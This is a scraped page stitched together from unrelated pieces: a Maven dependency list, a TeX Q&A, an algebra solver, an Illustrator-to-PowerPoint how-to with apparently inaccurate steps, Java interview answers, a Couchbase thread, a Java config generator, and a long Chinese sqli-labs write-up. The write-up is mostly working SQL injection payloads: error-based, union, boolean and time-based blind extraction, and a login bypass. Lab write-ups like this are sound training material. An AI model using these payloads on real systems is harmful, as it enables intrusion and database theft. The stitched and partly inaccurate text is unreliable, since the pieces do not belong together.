org.scala-lang.modules scala-collection-compat_2.12 2.1.1 org.scala-lang.modules scala-parser-combinators_2.12 1.1.2 org.scala-lang.modules scala-xml_2.12 1.2.0 org.scala-sbt test-interface 1.0 org.scalacheck scalacheck_2.12 1.14.2 org.scalactic scalactic_2.12 3.0.8 org.scalanlp breeze-macros_2.12 1.0 org.scalanlp breeze_2.12 1.0 org.scalatest scalatest_2.12 3.0.8 org.slf4j jcl-over-slf4j 1.7.30 org.slf4j jul-to-slf4j 1.7.30 org.slf4j slf4j-api 1.7.30 org.slf4j slf4j-log4j12 1.7.30 org.spark-project.spark unused 1.0.0 org.springframework spring-core 4.1.4.RELEASE org.springframework spring-test 4.1.4.RELEASE org.threeten threeten-extra 1.5.0 org.tukaani xz 1.5 org.typelevel algebra_2.12 2.0.0-M2 org.typelevel cats-kernel_2.12 2.0.0-M4 org.typelevel machinist_2.12 0.6.8 org.typelevel macro-compat_2.12 1.1.1 org.typelevel spire-macros_2.12 0.17.0-M1 org.typelevel spire-platform_2.12 0.17.0-M1 org.typelevel spire-util_2.12 0.17.0-M1 org.typelevel spire_2.12 0.17.0-M1 org.wildfly.openssl wildfly-openssl 1.0.7.Final org.xerial sqlite-jdbc 3.8.11.2 org.xerial.snappy snappy-java 1.1.8.2 org.yaml snakeyaml 1.24 oro oro 2.0.8 pl.edu.icm JLargeArrays 1.5 software.amazon.ion ion-java 1.0.2 stax stax-api 1.0.1 xmlenc xmlenc 0.52
__label__pos
0.570548
Take the 2-minute tour × TeX - LaTeX Stack Exchange is a question and answer site for users of TeX, LaTeX, ConTeXt, and related typesetting systems. It's 100% free, no registration required. Does anyone know how to resize the names of entries which appear as vertices inside \xymatrix? I have huge commuative cubes with more then 40 inner or outer vertices and when these names become too large then one cannot distinguish the edges of diagrams between them... share|improve this question   Welcome to TeX.sx! Usually, we don't put a greeting or a "thank you" in our posts. While this might seem strange at first, it is not a sign of lack of politeness, but rather part of our trying to keep everything very concise. Upvoting is the preferred way here to say "thank you" to users who helped you. A tip: You can use backticks ` to mark your inline code as I did in my edit. –  Kurt Oct 26 '12 at 13:29 add comment 1 Answer here's an approach that's rather a hack, as it must be applied manually to every vertex. \documentclass{article} \usepackage{amsmath} \usepackage[all]{xy} \newcommand{\smxylabel}[1]{{\text{\small$#1$}}} \begin{document} This diagram has normal-sized labels. \[ \xymatrix{% V_1 \ar[d]_\tau \ar[r]^{\rho_1(g) } & V_1 \ar[d]^\tau \\ V_2 \ar[r]^{\rho_2(g) } & V_2 } \] This diagram has ``smallified'' labels, hard coded. \[ \xymatrix{% \text{\small$V_1$} \ar[d]_{\text{\small$\tau$}} \ar[r]^{\text{\small$\rho_1(g)$} } & \text{\small$V_1$} \ar[d]^{\text{\small$\tau$}} \\ \text{\small$V_2$} \ar[r]^{\text{\small$\rho_2(g)$} } & \text{\small$V_2$} } \] This diagram uses a macro to shrink the labels. \[ \xymatrix{% \smxylabel{V_1} \ar[d]_{\smxylabel{\tau}} \ar[r]^{\smxylabel{\rho_1(g)} } & \smxylabel{V_1} \ar[d]^{\smxylabel{\tau}} \\ \smxylabel{V_2} \ar[r]^{\smxylabel{\rho_2(g)} } & \smxylabel{V_2} } \] \end{document} output of example code edit: the original poster asks whether it's possible to use \objectbox. i'm not familiar with that command, and have never used it, but it's definitely available in xypic. the way it's defined appears to correspond reasonably well to the concept of my hack. so i think it's worth a try. share|improve this answer   Thank you for your answer very much! It improves a solution of my problem. Do you know may I also use size modifiers using \objectbox? –  Igor Bakovic Oct 26 '12 at 19:45 add comment Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.993571
  Home Lessons Calculators Worksheets Resources Feedback Algebra Tutors Calculator Output Simplifying x2 + x + -3.75 = 0 Reorder the terms: -3.75 + x + x2 = 0 Solving -3.75 + x + x2 = 0 Solving for variable 'x'. Begin completing the square. Move the constant term to the right: Add '3.75' to each side of the equation. -3.75 + x + 3.75 + x2 = 0 + 3.75 Reorder the terms: -3.75 + 3.75 + x + x2 = 0 + 3.75 Combine like terms: -3.75 + 3.75 = 0.00 0.00 + x + x2 = 0 + 3.75 x + x2 = 0 + 3.75 Combine like terms: 0 + 3.75 = 3.75 x + x2 = 3.75 The x term is x. Take half its coefficient (0.5). Square it (0.25) and add it to both sides. Add '0.25' to each side of the equation. x + 0.25 + x2 = 3.75 + 0.25 Reorder the terms: 0.25 + x + x2 = 3.75 + 0.25 Combine like terms: 3.75 + 0.25 = 4 0.25 + x + x2 = 4 Factor a perfect square on the left side: (x + 0.5)(x + 0.5) = 4 Calculate the square root of the right side: 2 Break this problem into two subproblems by setting (x + 0.5) equal to 2 and -2. Subproblem 1 x + 0.5 = 2 Simplifying x + 0.5 = 2 Reorder the terms: 0.5 + x = 2 Solving 0.5 + x = 2 Solving for variable 'x'. Move all terms containing x to the left, all other terms to the right. Add '-0.5' to each side of the equation. 0.5 + -0.5 + x = 2 + -0.5 Combine like terms: 0.5 + -0.5 = 0.0 0.0 + x = 2 + -0.5 x = 2 + -0.5 Combine like terms: 2 + -0.5 = 1.5 x = 1.5 Simplifying x = 1.5 Subproblem 2 x + 0.5 = -2 Simplifying x + 0.5 = -2 Reorder the terms: 0.5 + x = -2 Solving 0.5 + x = -2 Solving for variable 'x'. Move all terms containing x to the left, all other terms to the right. Add '-0.5' to each side of the equation. 0.5 + -0.5 + x = -2 + -0.5 Combine like terms: 0.5 + -0.5 = 0.0 0.0 + x = -2 + -0.5 x = -2 + -0.5 Combine like terms: -2 + -0.5 = -2.5 x = -2.5 Simplifying x = -2.5 Solution The solution to the problem is based on the solutions from the subproblems. x = {1.5, -2.5} Processing time: 1 ms. 72543588 equations since February 08, 2004.   Disclaimer Completing the Square Calculator Equation: Variable:         Hint: Selecting "AUTO" in the variable box will make the calculator automatically solve for the first variable it sees. Home Lessons Calculators Worksheets Resources Feedback Algebra Tutors
__label__pos
0.999351
How To Convert Ai To Powerpoint Adobe Illustrator (AI) is a well-known software for creating vector graphics, commonly used by designers and artists. However, there may be instances where you need to change your AI file into a PowerPoint presentation. In this article, we will walk you through the steps of converting an AI file to a PowerPoint presentation. Step 1: Open Adobe Illustrator Firstly, open Adobe Illustrator on your computer. If you don’t have it installed, you can download it from the official Adobe website or purchase it from a retail store. Step 2: Open Your AI File Once you have opened Adobe Illustrator, open your AI file by clicking on “File” in the top left corner of the screen and selecting “Open”. Browse through your files and select the AI file that you want to convert into a PowerPoint presentation. Step 3: Save Your File as a PDF After opening your AI file, go to “File” in the top left corner of the screen and select “Save As”. In the “Save As” dialog box, choose “PDF” as the file format. Give your file a name and save it on your computer. Step 4: Open PowerPoint Now that you have saved your AI file as a PDF, open Microsoft PowerPoint on your computer. If you don’t have it installed, you can download it from the official Microsoft website or purchase it from a retail store. Step 5: Create a New Presentation Once you have opened PowerPoint, create a new presentation by clicking on “File” in the top left corner of the screen and selecting “New”. Choose a template that suits your needs or create a new one from scratch. Step 6: Import Your PDF File Now that you have created a new presentation, go to “File” in the top left corner of the screen and select “Import”. In the “Import” dialog box, choose “PDF” as the file format. Browse through your files and select the PDF file that you saved earlier. Click on “Import” to import your AI file into PowerPoint. Step 7: Edit Your Presentation After importing your AI file into PowerPoint, you can edit it as needed. You can add text, images, and other elements to enhance your presentation. Make sure to save your work regularly to avoid losing any changes. Step 8: Export Your Presentation Once you have edited your presentation, go to “File” in the top left corner of the screen and select “Export”. In the “Export” dialog box, choose “PowerPoint Show” as the file format. Give your file a name and save it on your computer. Conclusion In conclusion, converting an AI file into a PowerPoint presentation is a simple process that can be done in just a few steps. By following the steps outlined in this article, you can easily convert your AI file into a PowerPoint presentation and share it with others.
__label__pos
0.966469
Tutorials Java Basic Interview Question Java Interview Question Set3 Q1: Write main() method with correct signature? Given below is the main() method with correct type signature. public static void main(String[] args) { //main body } Q2: Explain meaning of each term in main() method? As we have already seen from above question that important terms in main are: • public • static • void • main • String[ ] args We have already provided detailed answer explaining each term in our java tutorial here: click to read   Q3: Shuffle the terms of main method and execute. Will it run? Yes it will run fine for some combinations. The code will compile and run if we write keywords in main() method in any order as shown below: • public static void main(String[] args) • static public void main(String[] args) But these combinations won't compile: • public void static main(String[] args) → compiler error as method main doesnot have valid return type. static is not a return type so this combination fails. • static void public main(String[] args) → Same reason as stated above Q4: Why main() method is needed in java? In java main() method is the entry point.  Whenever a program is executed the JVM search for the main method with the type signature as explained in question 1. So main is needed to start the program execution and help JVM locate the starting point of the program.   Q5: Can main() method be overloaded in java? Yes we can overload main method in java.   Find the example of main() method overloading given below: public class TutorialsInHand { public static void main(String[] args){ int a=10, b =40; main(a, b); } public static void main(int a,int b){ //overloaded main int result = a+b; System.out.println(result); } } Similarly you can overload more methods.  If you want to learn about method overloading in details then following the link to our java tutorial - click here Please Share this page Views : 111 Like every other website we use cookies. By using our site you acknowledge that you have read and understand our Cookie Policy, Privacy Policy, and our Terms of Service. Learn more Got it!
__label__pos
0.99919
Problem select date from string (yyyy-mm-dd hh:MM:ss) Hi all, i have document like this: { “mu”: { “id”: “test:1”, “dt”: “2017-07-07 07:00:00”, “type”: “test” } }, { “mu”: { “id”: “test:2”, “dt”: “2017-07-07 12:00:00”, “type”: “test” } }, { “mu”: { “id”: “test:3”, “dt”: “2017-07-05 09:00:00”, “type”: “test” } }, { “mu”: { “id”: “test:4”, “dt”: “2017-07-04 14:00:00”, “type”: “test” } }, { “mu”: { “id”: “test:5”, “tgl”: “2017-07-01 07:00:00”, “type”: “test” } } right now i want to select document that dt is greater from 2017-07-04, so i can have 3 document in the result. i already try: select * from mu where type=‘test’ and STR_TO_MILLIS(dt) > STR_TO_MILLIS(‘2017-07-04 00:00:00’) but the syntax problem. please help. thanks best regards, What errors it gives. It is works. insert into default values("test1",{"id": "test:1", "dt": "2017-07-07 07:00:00", "type": "test" }); select * from default where type='test' and STR_TO_MILLIS(dt) > STR_TO_MILLIS('2017-07-04 00:00:00'); { "requestID": "39dc0c43-ba12-4fba-89f8-95455d9d7fb2", "signature": { "*": "*" }, "results": [ { "default": { "dt": "2017-07-07 07:00:00", "id": "test:1", "type": "test" } } ] } If date is ISO 8601 format it is string comparable. select * from mu where type=‘test’ and dt > ‘2017-07-04’; Your query returns 4 documents not 3 (If the date string does not explicitly declare the value of a component, then a value of 0 is assumed. For example 2016-02-07 is equivalent to 2016-02-07T00:00:00. This is with the exception of the time zone, which if unspecified in the date string will default to the local system time zone.). https://developer.couchbase.com/documentation/server/current/n1ql/n1ql-language-reference/datefun.html
__label__pos
0.662807
SQL注入练习之sqli-labs靶场Writeup Less-1(报错型注入-字符串类型) 1. 打开之后让输入ID的,随便构造一个语句http://192.168.80.134/sql/Less-1/index.php?id=1,返回是正常的,再次构造语句index.php?id=1' 报错了,说明SQL语句在查询的时候把’也带入了查询语句,并且错误提示如下,可以看出是报错型注入 sqli-labs之LESS-1讲解(报错型注入) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 1. 继续构造语句:index.php?id=1' --+返回正常,说明我们的SQL语句构造成功,--+在MySQL语句中是注释符号,这句话相当于前面的’将前面的语句闭合了,而–+又把后面原本有的'闭合符号给注释掉了,所以语句执行正确。建议大家在学习的时候观看源码,其背后执行的SQL语句是: select * from users where id = ' 1' --+ ' 我们只需要把我们想要执行的SQL语句插入在–+之前 1. 查询字段 index.php?id=1' order by 3--+ 不断更换order by 后面的数字,通过这里来判断字段数,最终发现存在3个字段 1. 爆数据库 index.php?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),3) --+ 成功得到数据库名字为security其中0x7e是16进制编码的~符号,并无特殊意义。 sqli-labs之LESS-1讲解(报错型注入) 1. 爆表 index.php?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema ='security'),0x7e),3) --+ 其中security是我们上次爆出来的数据库名,这里可以看出成功爆出表名了。 sqli-labs之LESS-1讲解(报错型注入) 1. 爆字段 index.php?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name ='users'),0x7e),3) --+ 我们这里爆的是users表的字段,可以看到有id,username,password如下字段 sqli-labs之LESS-1讲解(报错型注入) 1. 爆数据 index.php?id=1' and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1) --+ 其中username就是我们想要爆出来的数据的字段,可以看到已经爆出来了如下用户名称。 sqli-labs之LESS-1讲解(报错型注入) 但是很明显用户名没有完全报出来,这是因为updatexml()这个是有长度限制的最长32位,这时候就该我们的另一个主角上场了,就是 SUBSTR() 截断函数,语法如下: SUBSTR(str,pos,len) # 就是从 str 字符串中,从 pos 位置开始,截取 len 个长度的字符 所以我们可以构造如下语句: index.php?id=1' union select updatexml(1,concat(0x7e,SUBSTR((select group_concat(username) from users),1,24),0x7e),1) --+ 上面这个语句就是从 1 开始,截断 24 个字符。 Less-2(报错型注入-整数类型) \1. 这是一个数字类型的报错注入,最常用的手法是在后面输入-1测试,比如 当我们构造语句: index.php?id=2 显示为Angelina,但是当我们在2的后面输入-1的时候,页面返回值变为了Dumb(即index.php?id=1的返回值),说明-1被带入了SQL语句中,此处很可能存在SQL注入漏洞 sqli-labs之Less-2讲解(报错型注入-整数类型) \2. 查询字段 index.php?id=1 order by 3 经过检测发现存在3个字段 \2. 爆数据库 此篇依旧使用报错型注入手法进行操作,与上一篇文章稍有不同 index.php?id=1 union select 1,count(*),concat(0x7e,0x7e,(select database()),0x7e,0x7e,floor(rand(0)*2))a from information_schema.columns group by a 得出数据库名字为:security sqli-labs之Less-2讲解(报错型注入-整数类型) 3.爆表 index.php?id=1 union Select 1,count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a 在这里因为使用了LIMIT限制语句,所以每次只会爆出来一个表,可以通过变换LIMIT的第一个参数来进行表的更换查询 比如: index.php?id=1 union Select 1,count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a 这条语句便是查询的第1张表,上一条语句查的是第0张表 sqli-labs之Less-2讲解(报错型注入-整数类型) 4.爆字段 index.php?id=1 union Select 1,count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name='emails' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a 同样这里的LIMIT同上,是可以更换值来查询不同的字段 经查询一共存在id和email_id两个字段 sqli-labs之Less-2讲解(报错型注入-整数类型) 5.爆数据 union Select 1,count(*),concat((select (select (SELECT distinct concat(0x7e,id_,0x7e,email_id,0x7e) FROM emails limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))a from information_schema.columns group by a 成功获得数据,LIMIT亦同上 sqli-labs之Less-2讲解(报错型注入-整数类型) Less-3(报错型注入-单引号) \1. 按照常规套路,打开网页构造语句: inde.php?id=1 加上'单引号,报错,如下: sqli-labs之Less-3讲解(报错型注入-单引号) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1 后面有括号,咱给他闭合上,继续构造语句: index.php?id=1') --+ 完美绕过,那么我们接下来就是要搞事情,只需要将你想要执行的SQL语句穿插进--+之前即可,很明显这里有报错信息,那么我们就直接使用报错注入就行啦~ 2.爆个数据库 index.php?id=1') union select 1,count(*),concat(0x7e,0x7e,(select database()),0x7e,0x7e,floor(rand(0)*2))a from information_schema.columns group by a --+ sqli-labs之Less-3讲解(报错型注入-单引号) 具体步骤以及语句和 Less-2 相同,只是多了后面的--+注释符号而已,不再赘述。 Less-4(报错型注入-双引号) 1.这篇解题思路与 Less-3 几乎没有任何差别,只需要将上一篇的单引号换成双引号引起报错即可。 2.继续使用报错注入,爆数据库 index.php?id=1") union select 1,count(*),concat(0x7e,0x7e,(select database()),0x7e,0x7e,floor(rand(0)*2))a from information_schema.columns group by a --+ sqli-labs之Less-4讲解(报错型注入-双引号) Less-5(布尔类型注入-单引号) 前言: 先来说一下什么是布尔类型注入,即你构造的SQL语句执行完毕之后只会返回给你真或者假,反馈到网页上的也就是只会返回给你是否存在。 1.正常执行 index.php?id=1 这条语句是完全没毛病的可以正常执行,所以页面返回的结果是如下 sqli-labs之Less-5讲解(布尔类型注入) 2.尝试报错 index.php?id=1' 返回提示: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 说明我们的分号是被带入到了SQL查询中的,所以报错了,那么只需要闭合即可 index.php?id=1' --+ 执行这条闭合完美执行成功,返回You are in….我们接下来的任务就是继续将SQL语句插入进去,但是注意这可是布尔注入,只会返回给你真假,所以有很多地方需要注意,下面继续讲解。 3.主要函数 这些都是布尔注入需要使用到的函数,下面都会用到并讲解的。 length() #返回字符串的长度 substr() #截取字符串 substr(a,b,c)作用将字符串a从第b位开始取c位数出来 ascii() #返回字符的ascii码 sleep(n) #将程序挂起休眠n秒 if(exp1,exp2,exp3) #判断语句,如果第一个语句正确就执行第二个语句,如果错误就执行第三个。 4.判断当前数据库名长度 第一次构造: index.php?id=1' and length(database())>1--+ 执行成功,布尔注入只能靠不断变换后面的数字来进行猜测数据库名长度。以当前数据库security数据库长度为例,如果出现大于7,但是不大于8,那么肯定就是当前数据库名长度等于8了,此时就可以使用如下语句进行判断 index.php?id=1' and length(database())=8--+ 如果返回为真,那么则说明数据库长度肯定是8位了。 5.猜测数据库名 猜测数据库名的时候需要一个一个地猜,我先用手工的演示,等下文章最后面会放上python脚本。 index.php?id=1' and ascii(substr(database(),1,1))>65--+ 这里我查询的是查询数据库名的第一位(即上面语句的第一个1的作用,substr查询不是从0开始的,就是从1开始的,第二个1的作用是只取一位,这个不用变)是否大于ascii码表的A,以此来判断数据库的第一位是哪个 如果我想查询第二个则是如下语句; index.php?id=1' and ascii(substr(database(),2,1))>65--+ 就这样不断尝试吧,因为我们刚才已经获取到了数据库名的长度,所以继续慢慢猜吧。 6.猜测表名 index.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) >65 --+ 这句的意思呢也就是通过limit限制只查询当前数据库的第0张表,然后substr函数的第一个1来限制第一个字符。结合起来就是猜测第一张表的第一个字符的ascii码是否大于65(即字母A)。加入存在多张表,可以通过变换limit的第一个参数0换为1来更换表继续查询。 7.猜测字段 index.php?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='password' limit 0,1),1,1)) >65 --+ 假设我们得到了一张表名为:password,那么我们还是跟上面一样,通过limit限制为第一个字段,然后substr函数来将从第一位取出一个来与ascii码表上的65(字母A)进行比较 index.php?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='password' limit 0,1),2,1)) >65 --+ 上面这一条呢就是将第0个字段的名字的第二个字符取出与ascii码表的64(字母A)进行比较 8.猜测数据 index.php?id=1' and ascii(substr((select keykey from id limit 0,1),1,1)) >65 --+ 意思与上面的一样,假设我们得到了一个字段:id 继续通过limit限制为数据的第一个字符,然后用substr函数来将从第一位取出一个来与ascii码表上的65(字母A)进行比较 9.恭喜你看到这里了,这种布尔类型的几乎没有人真的去完全猜测,都是拿脚本跑的,附上我的小脚本吧,此题适用,一般来说,这种布尔类型的直接修改payload都可以通用啦。 Github:SQL注入_布尔注入脚本 Less-6(布尔类型注入-双引号) 这道题跟 Less-5 第五题基本上没有任何区别,唯一的区别就是由上一题的单引号变为了双引号。 1.一般我们的操作都是先加上单引号'尝试一下报错,在这里我们发现加上单引号之后没什么反应,跟原先页面一样,那么我们就可以尝试一下双引号"了,这些都是一些基本思路。 index.php?id=1" 这样就报错了,然后就是后面加上注释符号进行闭合操作。 2.后续步骤 后续步骤就和 Less-5 一样了,没有任何区别的了。 Less-7(暂无解) 暂未解出 Less-8(盲注) 前言:此题是盲注类型的,具体为什么见下文 1.正常访问 正常访问语句为 ?id=1 可以看出来是页面返回正常,没啥毛病 2.构造干扰 id=1' 发现页面返回不正常了,说明分号被带入SQL查询了,我们进行闭合即可。 id=1' --+ 此时又返回正常了,说明闭合成功,接下来就是穿插SQL语句到里面。 3.查询字段 id=1' order by 3 --+ 不断变换order by后面的数据,最后发现存在3个字段 Less-9(基于时间盲注-单引号) 前言:这道题其实设置的有点古怪,无论你是否构造语句正确与否,都会只返回给你 You are in...........,所以你很难知道你是否闭合成功语句以及SQL语句是否执行成功,这里就需要依靠时间延时来进行判断了。 1.构造语句 ?id=1' and if(1=1,sleep(0),sleep(5)) --+ 上面这句话的意思就是,如果1=1这条SQL语句执行成功,那么久实行sleep(0)休眠0秒,如果1=1这条SQL语句执行错误,那么就执行sleep(5)休眠5秒,以此来进行判断SQL语句是否执行成功。这里的1=1,其实在下面就可以更换为我们想要执行的其他SQL语句。 sqli-labs之Less-9讲解(基于时间盲注) 从上面图中可以看到,当我们执行了一条正确的SQL语句时,浏览器很快就会返回结果,耗时一秒多,耗时绝对不会超过5秒。 sqli-labs之Less-9讲解(基于时间盲注) 而当我们执行了一条错误的SQL语句时,浏览器会一直转圈转圈加载5秒之后执行,共计耗时6秒多,耗时绝对超过5秒。 由此我们就可以构造我们的payload了,通过执行时间长短来进行判断构造的SQL语句是否执行正确。 2.布尔盲注 这道题说到底还是布尔盲注方向的,只不过是有了更多的限制条件了,其实跟前面的这篇文章Less-5(布尔类型注入-单引号)其实是一样的,基本无任何差别,建议参考一下,看看基础知识。 最后附上Python脚本,因为这种题目没有人是真正完全靠脑子去猜测的,都是脚本跑的。 Github:基于时间的布尔盲注 Less-10(基于时间盲注-双引号) 这道题跟第九题Less-10讲解(基于时间盲注-双引号)》原理一样,只是干扰报错信息换为了双引号而已,除此之外没有任何改变。建议配合Less-5讲解(布尔类型注入-单引号)这篇文章一起食用,效果更佳。 Less-11(POST注入-单引号) 前言: 从这道题开始呢,就是该POST基础注入了。 1.随便进行登录测试 随便输入账号密码进行测试一下返回结果,发现返回为空,没有任何有效信息返回,那么我们就开始构造万能密码进行尝试。在这里其实有一个SQL语句,真实环境下一般没有,这里这个SQL语句只能算是题目提示。 2.构造账号密码 用户名:a' or 1=1 # 密码:a 这里的密码是随意输入的,以下同是。账号则是我们精心构造的一个永为真的情况,a这个用户是不存在的,但是执行SQL语句时,查询不到a这个用户,然后继续or执行了1=1这条SQL语句,发现为真,#井号注释符把后面的语句全部给注释掉了,语句也就闭合了,完美返回用户名、密码。我们把上面的SQL放进Navicat在这里面执行以下更直观一些: sqli-labs之Less-11讲解(POST注入) 可以看到#后面的SQL语句都是被注释掉了的,并且因为为or 1=1为真,返回了所有的数据库的结果(在PHP页面上只能看到一条是因为在Less-11/index.php文件中使用了mysql_fetch_array函数,限制返回一条数据) 3.查询字段 用户名:a' or 1=1 order by 2 # 正确返回到我们想要的结果,经猜测存在两个字段。 4.查询显示位 a' and 1=1 union select 1,2 # 有细心的小伙伴们可能已经发现了上面我们一直用的or而这里改用了and,我们上面用or的原因是为了确保1=1这条SQL语句能够执行,所以用or,而这里用and是因为我们构造的用户名a在数据库中根本不存在(如果不确定数据库中是否存在可以随便起一个很长很长的名字),如果继续用or的话会返回所有的结果,而我们union select查询的结果就会排在最下面,就不会显示在网页页面上了,如图: sqli-labs之Less-11讲解(POST注入) 而使用and的话,就保证了union select其前面的SQL语句返回为空,然后继续执行union select返回其结果,如图: sqli-labs之Less-11讲解(POST注入) 或者你使用or 1=2效果也都是一样的,都是为了保证前面的返回结果为空。将上面的构造的SQL输入在用户名处,随便写上密码便可以看到显示位了。 5.查询数据库名 a' and 1=1 union select database(),user() # sqli-labs之Less-11讲解(POST注入) 可以看到已经返回了数据库名等信息 6.查询表名 a' and 1=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() # 7.查询字段 a' and 1=1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users' # 其中users是上面爆出来的表的名字 8.查询数据 a' and 1=1 union select 1,group_concat(password) from users # 其中password又是上面爆出来的字段名字 Less-12(POST注入-双引号_括号) 前言: 这道题跟Less-11是一样的,唯一不同之处便是,Less-11使用的是单引号包裹,而这道题使用的是双引号以及括号包裹。 1.构造语句 a") or 1=1 # 接下来的就跟Less-11(POST注入-单引号)》这里的操作一样,便不再赘述了。 Less-13(POST报错注入-单引号_括号) 同上 Less-14(POST报错注入-双引号) a" or updatexml(1,concat(0x7e,(select database()),0x7e),3) or 1=1 # 报错注入,不想写了 Less-15(POST布尔盲注注入-单引号) 前言: 一般登录处是比较容易存在SQL注入漏洞的,所以我们有时候在实战情况下找到了某个登录的地址,但是没有账号密码的情况下就可以尝试使用在登录处进行SQL注入。 1.随便尝试登录 随便构造几个常用的账号密码进行尝试登录,发现只要账号密码不对,登录框下面的提示一直是失败的,也就相当于现在比较常见的登陆失败直接提示:账号或密码输入错误。让你根本无法知道是账号错误还是密码错误,这样也就无法遍历用户名了,也是一种较为常用的保护机制。 2.构造账号密码 账号:a' or 1=1 # 密码:a 这里的账号和密码中的a其实是随便输入的,你可以随意替换。可以看到当我们输入这一组账号密码的时候,是显示登录成功的。但是我们只知道登陆成功,却无法直观看到其他类似于数据库名称,版本等信息,这是因为这里是一个盲注,可以使用基于时间的盲注也可以使用基于布尔类型的盲注。可以参考这篇文章Less-5(布尔类型注入-单引号)或者这篇[Less-9(基于时间盲注-单引号) 3.猜数据库长度 账号:a' or 1=1 and length(database())>1 # 密码:a 以这样的形式来进行数据库名长度的猜测。 4.猜数据库名 猜测数据库名的时候需要一个一个地猜,我这里用手工的演示。 账号:a' or 1=1 and ascii(substr(database(),1,1))>65 # 密码:a 这里我查询的是查询数据库名的第一位(即上面语句的第一个1的作用,substr查询不是从0开始的,就是从1开始的,第二个1的作用是只取一位,这个不用变)是否大于ascii码表的A,以此来判断数据库的第一位是哪个 如果我想查询第二个则是如下payload语句: 账号:a' or 1=1 and ascii(substr(database(),2,1))>65 # 密码:a 大家应该可以看出来差别了,只是变换了一下参数值大小,以此类推。 5.猜测表名 猜测出来数据库名之后接下来就是该猜测表名了,构造语句: 账号:a' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) >65 # 密码:a 这句的意思呢也就是通过limit限制只查询当前数据库的第0张表,然后substr函数的第一个1来限制第一个字符。结合起来就是猜测第一张表的第一个字符的ascii码是否大于65(即字母A)。加入存在多张表,可以通过变换limit的第一个参数0换为1来更换表继续查询。 6.猜测字段 假设我们得到了一张表名为:password,那么我们还是跟上面一样,通过limit限制为第一个字段,然后substr函数来将从第一位取出一个来与ascii码表上的65(字母A)进行比较 账号:a' or 1=1 and ascii(substr((select column_name from information_schema.columns where table_name='password' limit 0,1),1,1)) >65 # 密码:a 那么我们想将第0个字段的名字的第二个字符取出与ascii码表的64(字母A)进行比较则是如下语句: 账号:a' or 1=1 and ascii(substr((select column_name from information_schema.columns where table_name='password' limit 0,1),2,1)) >65 # 密码:a 7.猜测数据 账号:a' or 1=1 and ascii(substr((select keykey from id limit 0,1),1,1)) >65 # 密码:a 意思与上面的一样,假设我们得到了一个字段:id 继续通过limit限制为数据的第一个字符,然后用substr函数来将从第一位取出一个来与ascii码表上的65(字母A)进行比较 结束语 其实这种SQL注入只要找打规律之后一般大佬的操作就是写个 Python 脚本来跑的,没有人去完全靠手工猜测的,建议使用 Python。 文章作者: Writeup 版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Writeup !  上一篇 HTTP/2.0的优点 HTTP/2.0的优点 前言目前的网络世界已经发展的极其迅速,而目前作为主流的 HTTP 协议版本 HTTP/1.1 协议将会逐渐被 HTTP/2.0 或 HTTP/3.0 所替代。国外的大型互联网厂商比如:Google、FaceBook、Twitter等都已经开 2020-10-12 下一篇  ECShop <= 2.x/3.6.x/3.0.x 版本远程代码执行高危漏洞利用 ECShop <= 2.x/3.6.x/3.0.x 版本远程代码执行高危漏洞利用 一、简介这一篇文章接下来我会分为两个部分来写,因为 ECShop 其实两个比较大的远程代码执行是有两个不同版本先后爆出来的,首先被爆出来的是:ECShop <= 2.7.x 全系列版本远程代码执行高危漏洞,然后紧接着 ECShop 官 2020-10-11   目录
__label__pos
0.608367
IT源码网 idea中ssm自动配置讲解 xmjava 2021年02月13日 编程语言 142 0 自动生成 只需要创建好maven项目,然后创建一个类Test,复制代码粘贴即可 使用注意: 代码 import java.io.*; public class Test { //包名格式 //列如配置到com.wbg.ssm包下 程序会自动添加dao\controller\service\entity private final static String com = "com.wbg.ssm"; //数据库名称 private final static String database = ""; //数据库账号 private final static String user = "root"; //数据库密码 private final static String password = "123456"; public static void main(String[] args) throws IOException { createStart(); } static void createStart() { //获取当前项目的路径 String url = System.getProperty("user.dir"); System.out.println("开始配置pom.xml"); System.out.println(configPomXml(url)); url = url + File.separator + "src" + File.separator + "main"; System.out.println("开始配置resources目录"); createResources(url + File.separator + "resources"); System.out.println("完成配置resources目录"); System.out.println("开始配置webapp目录"); createWebapp(url + File.separator + "webapp"); System.out.println("完成配置webapp目录"); } //***********************Resources************************ /** * 创建四个配置文件 * dbc.properties * log4j.properties * mybatis-config.xml * spring-web.xml * * @return */ static boolean createResources(String url) { if (createJdbcProperties(url)) { System.out.println("jdbc.properties配置成功"); } else { System.out.println("jdbc.properties配置失败"); } if (log4jProperties(url)) { System.out.println("log4j.properties配置成功"); } else { System.out.println("log4j.properties配置失败"); } if (mybatisConfig(url)) { System.out.println("mybatis-config.xml配置成功"); } else { System.out.println("mybatis-config.xml配置失败"); } if (springWeb(url)) { System.out.println("spring-web.xml配置成功"); } else { System.out.println("spring-web.xml配置失败"); } if (generatorConfig(url)) { 